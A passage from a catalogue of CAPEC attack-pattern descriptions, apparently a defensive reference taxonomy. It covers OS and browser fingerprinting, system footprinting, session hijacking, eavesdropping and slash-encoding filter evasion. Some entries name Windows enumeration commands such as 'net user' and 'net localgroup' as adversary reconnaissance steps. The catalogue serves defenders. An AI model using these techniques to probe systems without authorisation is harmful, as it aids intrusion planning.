This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.
CAPEC-328: TCP 'RST' Flag Checksum Probe
This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.
CAPEC-329: ICMP Error Message Quoting Probe
An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or "Quoted" from the originating request that generated the ICMP error message.
CAPEC-330: ICMP Error Message Echoing Integrity Probe
An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or "Quoted" from the originating request that generated the error message.
CAPEC-472: Browser Fingerprinting
An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
CAPEC-497: File Discovery
An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.
CAPEC-508: Shoulder Surfing
In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content "over the victim's shoulder", as implied by the name of this attack.
CAPEC-573: Process Footprinting
An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.
CAPEC-574: Services Footprinting
An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include "sc" and "tasklist/svc" using Tasklist, and "net start" using Net.
CAPEC-575: Account Footprinting
An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: "net user" and "dsquery".
CAPEC-576: Group Permission Footprinting
An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is "net localgroup".
CAPEC-577: Owner Footprinting
An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is "dir /A ntuser.dat". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-60: Reusing Session IDs (aka Session Replay)
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
CAPEC-616: Establish Rogue Location
An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.
CAPEC-643: Identify Shared Files/Directories on System
An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.
CAPEC-646: Peripheral Footprinting
Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.
CAPEC-651: Eavesdropping
An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.
CAPEC-79: Using Slashes in Alternate Encoding
This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.